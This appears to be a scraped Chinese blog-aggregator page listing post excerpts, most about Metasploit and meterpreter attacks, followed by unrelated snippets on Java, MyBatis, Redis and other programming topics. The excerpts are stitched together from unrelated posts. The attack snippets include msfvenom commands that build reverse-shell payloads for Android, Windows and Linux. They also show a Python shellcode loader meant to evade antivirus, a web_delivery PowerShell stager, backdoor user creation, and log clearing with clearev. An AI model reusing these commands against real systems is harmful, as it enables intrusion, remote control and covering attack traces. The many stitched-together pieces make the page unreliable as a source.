- 关于MSF手机渗透木马制作
嗨起飞了
网络安全网络攻击模型网络安全
基于Metasploit的Android渗透测试防御指南⚠️法律声明本文所有技术内容仅用于安全研究,严禁非法使用!测试需获得合法授权。一、环境搭建#Kali基础环境sudoaptupdate&&sudoaptinstall-ymetasploit-frameworkapktool二、载荷生成msfvenom-pandroid/meterpreter/reverse_tcp\LHOST=your_v
- msf php脚本提权,利用Metasploit提权Linux主机思路
weixin_39640904
msfphp脚本提权
本帖最后由小爱_Joker于2017-3-913:28编辑大晚上的写个文章不容易而且有点小冷利用metasploit提权Linux主机主要就是用msf生成一个马子上传到webshell打开马子后你就会发现你的msf已经建立了一个回话下面进入正题PHPMeterpretermetasploit有一个名为PHPMeterpreter的payload,可创建具有meterpreter功能的PHPwebs
- 内网渗透概述
BTY@BTY
服务器运维网络安全安全web安全
渗透概念正向shell:攻击者连接被攻击者机器,可用于攻击者处于内网,被攻击者处于公网的情况。攻击者–>被攻击者反向shell:被攻击者主动连接攻击者,可用于攻击者处于外网,被攻击者处于内网的情况。攻击者abc.exeAndroidAndroid:msfvenom-pandroid/meterpreter/reverse_tcpLHOST=192.168.107.129LPORT=5555R>/r
- 红日三打靶!!!
郑居中3.0
红日安全红日三靶机Gaara靶机redispythoneclipse
红日三,黑盒测试环境搭建一.外网打点1.网段探测2.端口服务扫描3.目录扫描4.网站漏洞扫描5.汇总,找破绽6.登陆MySQL改密码7.进入后台,找能写马的地方8.蚁剑连接9.disable_functions绕过1.蚁剑插件绕过2.bypass_disablefunc_via_LD_PRELOAD绕过10.分析11.ssh连接二.脏牛提权三.拿root用户的meterpreter1.msfven
- python免杀
只喜欢打乒乓球
python开发语言网络安全web安全
实验靶机:win10攻击机:kali192.168.117.1291.先在kali上输入msfvenom-pwindows/x64/meterpreter/reverse_tcpLHOST=192.168.117.129LPORT=4444-fpy打开vs新建一个python文件、写入64位加载#!/usr/bin/pythonimportctypes#这里直接粘贴刚刚msf生成的shellcod
- 红日靶场之sta&&ck远程桌面控制 个人学习)
曼达洛战士
学习
我们首先打开webshell工具然后切换到C盘的www的文件夹下面然后我们打开MSF工具进行监听模板msfconsole启动MSF工具然后是useexploit/multi/handler使用漏洞辅助模块setpayloadwindows/meterpreter/reverse_tcp这是利用漏洞tcp回弹模块setlhost192.168.52.129这是设置回弹的主机这里是我们的kali攻击机
- meterpreter后期攻击使用方法
小银同学阿
meterpreter后期攻击使用方法1、上传文件到Windows主机upload命令2:从windows主机下载文件download注意:Windows路径要使用双斜线命令3:在目标主机上执行exe文件execute-f[options]例:execute-fc://1.exe命令4:创建CMD新通道execute-fcmd-c命令5:显示进程(相当于打开任务管理器)ps命令会显示目标主机上所有
- vulnhub--DC1
baiyexing8
数据库php安全
一.信息收集扫存活主机arp-scan-l扫描靶场开放端口nnap-sS-v192.168.111.130查看80端口二.漏洞利用msf攻击拿到meterpreter以后查看当前目录,发现flag1.txt,cat得到flag1根据flag1的提示百度,得到Drupal的数据库配置文件在sites/default/settings.phpcatsetting.php得到flag2.txt三.提权接
- MSF横向拓展(流量代理,端口代理转发)--详细教程
别动我的cat
php网络开发语言网络安全
一.通过被控制的受害者主机获取受害者主机所在的其他网络route获取受害者主机的路由表ipconfig/ifconfig查看当前主的网络情况通过上面两个命令发现win7是还连接着一个10.11.12.0/24的网络二.添加到达网络的路由1.通过meterpreter中的post/multi/manage/autoroute模块来添加到达主机的路径runpost/multi/manage/autor
- 【精选】win7内网穿透&meterpreter后渗透&msf开启摄像头
hacker-routing
【精选】VulnHub渗透测试靶场练习平台webwindowslinux系统开发linux运维服务器网络网络安全kalimetersphere
博主介绍博主介绍:大家好,我是hacker-routing,很高兴认识大家~✨主攻领域:【渗透领域】【应急响应】【python】【VulnHub靶场复现】【面试分析】点赞➕评论➕收藏==养成习惯(一键三连)欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋作者水平有限,欢迎各位大佬指点,相互学习进步!目录###msf开启摄像头######meterpreter后渗透###win
- 利用metasploit提权
shadowflow
MS16-016漏洞提权实战启动msfuseexploit/multi/script/web_deliveryinfosettarget2showpayloadssetpayloadwindows/meterpreter/reverse_tcpshowoptionsexploit复制生成的powershell命令打开目标机,打开cmd,执行刚刚复制的内容连接getsystemgetuidshell
- MSF+FRP实现内网渗透
无情剑客Burning
声明:严禁用作非法目的,谢绝一切形式的转载。在这里对介绍了如何通过frp进行内网穿透。本篇文章将frp与MSF结合起来,实现获取被入侵机器("肉鸡")的控制权。网络拓扑通过家庭kali主机,获取到肉鸡的meterpreter。frp配置frpsfrp服务器端配置文件frps.ini如下:使用了dashboard。通过dashboard可以查看frp服务器的状态。运行frps./frps-cfrps
- 使用SET+MSF 渗透工具对Win 7 靶机进行一次完整攻击记录
别JUAN我
网络服务器linux安全
接上篇,演示SET+MSF渗透工具Win7虚拟机靶机进行生成木马、获得主机Shell、权限提升、远程桌面监控、日志清除、后门植入一套较为完整的攻击流程。kali攻击机:172.16.32.129win7被攻击机:172.16.32.128“”该文章仅用于学习交流“”1、第一步还是先使用SET,选择社会工程攻击。2、选择创建攻击载荷并监听,并使用Meterpreter攻击返回shell,接着设置监听
- meterpreter木马原理分析
~巴哥~
恶意代码分析恶意代码分析
本文主要分析meterpreter木马的原理,原理比较简单:首先会分配一段缓冲区,加载一段shellcode,在shellcode中调用winsocketAPI与服务器端进行通信,下载一个反射型dll,在内存中加载,使用peb的方式来获取系统的api地址,C2的地址是以整数的方式存储在代码中。环境kali192.168.213.130用于生成木马,搭建c2服务器windowsx64192.168.
- CobaltStrike windows木马原理分析
~巴哥~
恶意代码分析恶意代码分析
本文主要介绍CobaltStrikewindows型木马的原理,同Meterpreter大体类似。不同之处有使用了命名管道,使用了http的相关api来下载payload,同样使用的peb来获取api的地址,最后的后门是一个反射型dll。安装CobaltStrike环境环境:kali192.168.1.19cs服务器win10192.168.1.1cs客户端win7x64192.168.1.20测
- Meterpreter的常用命令合集
先瘦个二十斤
shellmetasploitnethack安全经验分享
0x01.基本命令help#查看Meterpreter帮助background#返回,把meterpreter后台挂起bgkill#杀死一个背景meterpreter脚本bglist#提供所有正在运行的后台脚本的列表bgrun#作为一个后台线程运行脚本channel#显示活动频道sessions-inumber#与会话进行交互,number表示第n个session,使用session-i连接到指定
- CVE-2018-4887 Flash漏洞
夜间飛行
网络安全
目录1.目的2.原理3.操作过程编辑总结1.目的由于Flash存在CVE-2018-4878这个高危漏洞,导致Windows靶机访问含flash的页面时,直接被KaliLinux控制2.原理攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被“远程代码执行”,并且直接被getshell。Meterpreter:一款开源的安全漏洞检测工具,可以帮助安全和
- Metasploit框架(3), meterpreter 常用命令, sniffer流量监听, portfwd端口转发, kiwi, Mimikatz密码破解
DeltaTime
渗透测试-入侵提权渗透测试web安全
Metasploit框架(3),meterpreter常用命令与扩展工具进入到meterpreter>提示符环境下才能执行命令一,常用命令sysinfo#系统信息getuid#当前用户getprivs#当前权限loadpriv#加载privgetsystem#提权到系统权限clearev#清除系统日志,安全日志,避免朔源quit#关闭meterpreter,关闭session连接,退回msf模块控
- 【网络安全】meterpreter攻击实战
茗樱.Stella
web安全安全
1.meterpreter攻击成功后可以做什么指令?远程控制+命令执行+摄像头监控+密码获取+创建后门用户+破坏篡改系统。2.创建后门用户并开启远程连接:netuserzhangsan123456/add&&netlocalgroupadminstratorszhangsan/addexitrungetgul-e3.攻击系统:①reverse_tcp是一个基于TCP的反向链接反弹shell,使用起
- msf复现永恒之蓝漏洞ms17-010(详解)
网安小t
安全网络安全系统安全
目录实验环境实验目的永恒之蓝简介Metasploit简介复现永恒之蓝漏洞1首先使用namp扫描一下windows7编辑2使用工具3查找永恒之蓝漏洞模块4漏洞检测5实现漏洞利用6meterpreter命令举例实验环境kali攻击机172.23.19.152windows7靶机172.23.19.128实验目的通过MSF复现永恒之蓝漏洞永恒之蓝简介背景:永恒之蓝(EternalBlue)爆发于2017
- MSF 详解
网安小t
系统安全网络安全web安全安全
目录MSF官网MSF简介MSF框架结构kaliMetasploit更新常见名词解释MSF命令MSF命令查询数据库管理命令核心命令模块命令进程命令资源脚本命令后台数据库命令后端凭证命令开发者命令攻击载荷命令Meterpreter扩展模块Meterpreter常用命令Meterpreter核心命令Meterpreter文件系统命令Meterpreter网络命令Meterpreter系统命令Meterp
- 红队攻防之特殊场景上线cs和msf
各家兴
#1.红队实战0.红队攻防#2.内网攻防python开发语言渗透测试web安全代码审计红队攻防攻防实战
倘见玉皇先跪奏:他生永不落红尘本文首发于先知社区,原创作者即是本人网络拓扑图一、msf正向木马拿不出网域控shellmsf生成木马msfvenom-pwindows/x64/meterpreter/bind_tcplport=4444-fraw-omsf1.bin用msfvenom生成一个正向马传进去(因为无法访问外网,反向出不来),msf正向连接。域控上线msf通过域控web服务的shell进行
- MSF学习笔记
xiaopeisec
渗透工具postgresql网络安全web安全
目录一.MSF启动二.MSF目录结构于核心模块三.msfvenom常用参数四.基于MSF发现内网存活主机五.利用MSF创建后门程序六.Meterpreter常用命令常用命令:文件系统命令:用户设备命令:开启远程桌面收集信息针对未安装补丁攻击注册表设置nc后门一.MSF启动1.先启动postgresql数据库,这个是msf的默认数据库servicepostgresqlstart2.如果是第一次使用还
- 3、MSF使用
PT_silver
深信服SCSA-S认证安全
文章目录一、利用ms17-010漏洞对靶机执行溢出攻击二、后渗透模块meterpreter的使用一、利用ms17-010漏洞对靶机执行溢出攻击分别输入以下命令,使用ms17_010_eternalblue模块对目标机的ms17-010漏洞进行利用:useexploit/windows/smb/ms17_010_eternalblue//使用ms17_010_eternalblue模块setRHOS
- kali渗透内网和外网
孤寂204
网络安全服务器
生成木马文件,从而控制对方电脑(这里只能在同一个局域网下才能入侵)第一步:输入msfvenom命令生成一个payload,相关参数与命令如下:-p:使用反向远程控制程序“windows/meterpreter/reverse_tcp”lhost:设置kali的IPlport:设置端口(要与下面的setlport保持一致)-f:文件的类型为exe类型-o:生成payload,名为payload.ex
- MSF派生给另外MSF,meterpreter派生给另外meterpreter,Metasploit
qq_29060627
安全
首先是通过ms17_010永恒之蓝拿下shell,192.168.50.146为受害者靶机,192.168.50.130为kali的ipsetautorunscriptpost/windows/manage/migratename=services.exesetpayloadwindows/x64/meterpreter/reverse_tcpsetlport5577setlhost192.168
- Linux下Meterpreter执行原理浅析
慕长风啊
前言针对Meterpreter的投递流程和原理分析,网上已有一部分相关资料了但是大多是基于Windows系统,Linux下的分析资料好像并不全面。为此,我从源码入手,简单的分析了Linux下Meterpreter的生成和执行流程,以下记录了部分过程说明研究对象:linux/x86/meterpreter/reverse_tcp这种staged类型的payload,攻击过程通常是先由服务端生成一段s
- 四种常用的meterpreter木马后门
孤独的一颗星
msfvenom使用msfvenom软件生成木马后门,在目标机上执行后门,在本地机上监听上线。小提示:maf即是metasploit,venom即是病毒如果不知道msfvenom怎么用,可以msfvenom-h查看,四种生成后门的命令:windows可执行程序后门:msfvenom-pwindows/meterpreter/reverse_tcpLHOST=LPORT=-fexe>shell.ex
- msf生成linux shellcode,使用MSF打造各种ShellCode
weixin_39866419
msf生成linuxshellcode
生成各种后门Windows:msfvenom-ax86--platformWindows-pwindows/meterpreter/reverse_tcpLHOST=攻击机IPLPORT=攻击机端口-ex86/shikata_ga_nai-b'\x00\x0a\xff'-i3-fexe-opayload.exeLinux:msfvenom-ax86--platformLinux-plinux/x8
- python加载shellcode免杀
ctostm
python网络开发语言网络安全web安全安全
1、第一个shellcode加载器importctypes#msf生成的shellcode,命令:msfvenom-ex64/xor_dynamic-i16-pwindows/x64/meterpreter_reverse_tcplhost=192.168.111.111lport=80-fpy-oshell.pybuf=b""buf+=b"\xeb\x27\x5b\x53\x5f\xb0\xe7
- Java开发中,spring mvc 的线程怎么调用?
小麦麦子
springmvc
今天逛知乎,看到最近很多人都在问spring mvc 的线程http://www.maiziedu.com/course/java/ 的启动问题,觉得挺有意思的,那哥们儿问的也听仔细,下面的回答也很详尽,分享出来,希望遇对遇到类似问题的Java开发程序猿有所帮助。
问题:
在用spring mvc架构的网站上,设一线程在虚拟机启动时运行,线程里有一全局
- maven依赖范围
bitcarter
maven
1.test 测试的时候才会依赖,编译和打包不依赖,如junit不被打包
2.compile 只有编译和打包时才会依赖
3.provided 编译和测试的时候依赖,打包不依赖,如:tomcat的一些公用jar包
4.runtime 运行时依赖,编译不依赖
5.默认compile
依赖范围compile是支持传递的,test不支持传递
1.传递的意思是项目A,引用
- Jaxb org.xml.sax.saxparseexception : premature end of file
darrenzhu
xmlprematureJAXB
如果在使用JAXB把xml文件unmarshal成vo(XSD自动生成的vo)时碰到如下错误:
org.xml.sax.saxparseexception : premature end of file
很有可能时你直接读取文件为inputstream,然后将inputstream作为构建unmarshal需要的source参数。InputSource inputSource = new In
- CSS Specificity
周凡杨
html权重Specificitycss
有时候对于页面元素设置了样式,可为什么页面的显示没有匹配上呢? because specificity
CSS 的选择符是有权重的,当不同的选择符的样式设置有冲突时,浏览器会采用权重高的选择符设置的样式。
规则:
HTML标签的权重是1
Class 的权重是10
Id 的权重是100
- java与servlet
g21121
servlet
servlet 搞java web开发的人一定不会陌生,而且大家还会时常用到它。
下面是java官方网站上对servlet的介绍: java官网对于servlet的解释 写道
Java Servlet Technology Overview Servlets are the Java platform technology of choice for extending and enha
- eclipse中安装maven插件
510888780
eclipsemaven
1.首先去官网下载 Maven:
http://www.apache.org/dyn/closer.cgi/maven/binaries/apache-maven-3.2.3-bin.tar.gz
下载完成之后将其解压,
我将解压后的文件夹:apache-maven-3.2.3,
并将它放在 D:\tools目录下,
即 maven 最终的路径是:D:\tools\apache-mave
- jpa@OneToOne关联关系
布衣凌宇
jpa
Nruser里的pruserid关联到Pruser的主键id,实现对一个表的增删改,另一个表的数据随之增删改。
Nruser实体类
//*****************************************************************
@Entity
@Table(name="nruser")
@DynamicInsert @Dynam
- 我的spring学习笔记11-Spring中关于声明式事务的配置
aijuans
spring事务配置
这两天学到事务管理这一块,结合到之前的terasoluna框架,觉得书本上讲的还是简单阿。我就把我从书本上学到的再结合实际的项目以及网上看到的一些内容,对声明式事务管理做个整理吧。我看得Spring in Action第二版中只提到了用TransactionProxyFactoryBean和<tx:advice/>,定义注释驱动这三种,我承认后两种的内容很好,很强大。但是实际的项目当中
- java 动态代理简单实现
antlove
javahandlerproxydynamicservice
dynamicproxy.service.HelloService
package dynamicproxy.service;
public interface HelloService {
public void sayHello();
}
dynamicproxy.service.impl.HelloServiceImpl
package dynamicp
- JDBC连接数据库
百合不是茶
JDBC编程JAVA操作oracle数据库
如果我们要想连接oracle公司的数据库,就要首先下载oralce公司的驱动程序,将这个驱动程序的jar包导入到我们工程中;
JDBC链接数据库的代码和固定写法;
1,加载oracle数据库的驱动;
&nb
- 单例模式中的多线程分析
bijian1013
javathread多线程java多线程
谈到单例模式,我们立马会想到饿汉式和懒汉式加载,所谓饿汉式就是在创建类时就创建好了实例,懒汉式在获取实例时才去创建实例,即延迟加载。
饿汉式:
package com.bijian.study;
public class Singleton {
private Singleton() {
}
// 注意这是private 只供内部调用
private static
- javascript读取和修改原型特别需要注意原型的读写不具有对等性
bijian1013
JavaScriptprototype
对于从原型对象继承而来的成员,其读和写具有内在的不对等性。比如有一个对象A,假设它的原型对象是B,B的原型对象是null。如果我们需要读取A对象的name属性值,那么JS会优先在A中查找,如果找到了name属性那么就返回;如果A中没有name属性,那么就到原型B中查找name,如果找到了就返回;如果原型B中也没有
- 【持久化框架MyBatis3六】MyBatis3集成第三方DataSource
bit1129
dataSource
MyBatis内置了数据源的支持,如:
<environments default="development">
<environment id="development">
<transactionManager type="JDBC" />
<data
- 我程序中用到的urldecode和base64decode,MD5
bitcarter
cMD5base64decodeurldecode
这里是base64decode和urldecode,Md5在附件中。因为我是在后台所以需要解码:
string Base64Decode(const char* Data,int DataByte,int& OutByte)
{
//解码表
const char DecodeTable[] =
{
0, 0, 0, 0, 0, 0
- 腾讯资深运维专家周小军:QQ与微信架构的惊天秘密
ronin47
社交领域一直是互联网创业的大热门,从PC到移动端,从OICQ、MSN到QQ。到了移动互联网时代,社交领域应用开始彻底爆发,直奔黄金期。腾讯在过去几年里,社交平台更是火到爆,QQ和微信坐拥几亿的粉丝,QQ空间和朋友圈各种刷屏,写心得,晒照片,秀视频,那么谁来为企鹅保驾护航呢?支撑QQ和微信海量数据背后的架构又有哪些惊天内幕呢?本期大讲堂的内容来自今年2月份ChinaUnix对腾讯社交网络运营服务中心
- java-69-旋转数组的最小元素。把一个数组最开始的若干个元素搬到数组的末尾,我们称之为数组的旋转。输入一个排好序的数组的一个旋转,输出旋转数组的最小元素
bylijinnan
java
public class MinOfShiftedArray {
/**
* Q69 旋转数组的最小元素
* 把一个数组最开始的若干个元素搬到数组的末尾,我们称之为数组的旋转。输入一个排好序的数组的一个旋转,输出旋转数组的最小元素。
* 例如数组{3, 4, 5, 1, 2}为{1, 2, 3, 4, 5}的一个旋转,该数组的最小值为1。
*/
publ
- 看博客,应该是有方向的
Cb123456
反省看博客
看博客,应该是有方向的:
我现在就复习以前的,在补补以前不会的,现在还不会的,同时完善完善项目,也看看别人的博客.
我刚突然想到的:
1.应该看计算机组成原理,数据结构,一些算法,还有关于android,java的。
2.对于我,也快大四了,看一些职业规划的,以及一些学习的经验,看看别人的工作总结的.
为什么要写
- [开源与商业]做开源项目的人生活上一定要朴素,尽量减少对官方和商业体系的依赖
comsci
开源项目
为什么这样说呢? 因为科学和技术的发展有时候需要一个平缓和长期的积累过程,但是行政和商业体系本身充满各种不稳定性和不确定性,如果你希望长期从事某个科研项目,但是却又必须依赖于某种行政和商业体系,那其中的过程必定充满各种风险。。。
所以,为避免这种不确定性风险,我
- 一个 sql优化 ([精华] 一个查询优化的分析调整全过程!很值得一看 )
cwqcwqmax9
sql
见 http://www.itpub.net/forum.php?mod=viewthread&tid=239011
Web翻页优化实例
提交时间: 2004-6-18 15:37:49 回复 发消息
环境:
Linux ve
- Hibernat and Ibatis
dashuaifu
Hibernateibatis
Hibernate VS iBATIS 简介 Hibernate 是当前最流行的O/R mapping框架,当前版本是3.05。它出身于sf.net,现在已经成为Jboss的一部分了 iBATIS 是另外一种优秀的O/R mapping框架,当前版本是2.0。目前属于apache的一个子项目了。 相对Hibernate“O/R”而言,iBATIS 是一种“Sql Mappi
- 备份MYSQL脚本
dcj3sjt126com
mysql
#!/bin/sh
# this shell to backup mysql
#
[email protected] (QQ:1413161683 DuChengJiu)
_dbDir=/var/lib/mysql/
_today=`date +%w`
_bakDir=/usr/backup/$_today
[ ! -d $_bakDir ] && mkdir -p
- iOS第三方开源库的吐槽和备忘
dcj3sjt126com
ios
转自
ibireme的博客 做iOS开发总会接触到一些第三方库,这里整理一下,做一些吐槽。 目前比较活跃的社区仍旧是Github,除此以外也有一些不错的库散落在Google Code、SourceForge等地方。由于Github社区太过主流,这里主要介绍一下Github里面流行的iOS库。 首先整理了一份
Github上排名靠
- html wlwmanifest.xml
eoems
htmlxml
所谓优化wp_head()就是把从wp_head中移除不需要元素,同时也可以加快速度。
步骤:
加入到function.php
remove_action('wp_head', 'wp_generator');
//wp-generator移除wordpress的版本号,本身blog的版本号没什么意义,但是如果让恶意玩家看到,可能会用官网公布的漏洞攻击blog
remov
- 浅谈Java定时器发展
hacksin
java并发timer定时器
java在jdk1.3中推出了定时器类Timer,而后在jdk1.5后由Dou Lea从新开发出了支持多线程的ScheduleThreadPoolExecutor,从后者的表现来看,可以考虑完全替代Timer了。
Timer与ScheduleThreadPoolExecutor对比:
1.
Timer始于jdk1.3,其原理是利用一个TimerTask数组当作队列
- 移动端页面侧边导航滑入效果
ini
jqueryWebhtml5cssjavascirpt
效果体验:http://hovertree.com/texiao/mobile/2.htm可以使用移动设备浏览器查看效果。效果使用到jquery-2.1.4.min.js,该版本的jQuery库是用于支持HTML5的浏览器上,不再兼容IE8以前的浏览器,现在移动端浏览器一般都支持HTML5,所以使用该jQuery没问题。HTML文件代码:
<!DOCTYPE html>
<h
- AspectJ+Javasist记录日志
kane_xie
aspectjjavasist
在项目中碰到这样一个需求,对一个服务类的每一个方法,在方法开始和结束的时候分别记录一条日志,内容包括方法名,参数名+参数值以及方法执行的时间。
@Override
public String get(String key) {
// long start = System.currentTimeMillis();
// System.out.println("Be
- redis学习笔记
MJC410621
redisNoSQL
1)nosql数据库主要由以下特点:非关系型的、分布式的、开源的、水平可扩展的。
1,处理超大量的数据
2,运行在便宜的PC服务器集群上,
3,击碎了性能瓶颈。
1)对数据高并发读写。
2)对海量数据的高效率存储和访问。
3)对数据的高扩展性和高可用性。
redis支持的类型:
Sring 类型
set name lijie
get name lijie
set na
- 使用redis实现分布式锁
qifeifei
在多节点的系统中,如何实现分布式锁机制,其中用redis来实现是很好的方法之一,我们先来看一下jedis包中,有个类名BinaryJedis,它有个方法如下:
public Long setnx(final byte[] key, final byte[] value) {
checkIsInMulti();
client.setnx(key, value);
ret
- BI并非万能,中层业务管理报表要另辟蹊径
张老师的菜
大数据BI商业智能信息化
BI是商业智能的缩写,是可以帮助企业做出明智的业务经营决策的工具,其数据来源于各个业务系统,如ERP、CRM、SCM、进销存、HER、OA等。
BI系统不同于传统的管理信息系统,他号称是一个整体应用的解决方案,是融入管理思想的强大系统:有着系统整体的设计思想,支持对所有
- 安装rvm后出现rvm not a function 或者ruby -v后提示没安装ruby的问题
wudixiaotie
function
1.在~/.bashrc最后加入
[[ -s "$HOME/.rvm/scripts/rvm" ]] && source "$HOME/.rvm/scripts/rvm"
2.重新启动terminal输入:
rvm use ruby-2.2.1 --default
把当前安装的ruby版本设为默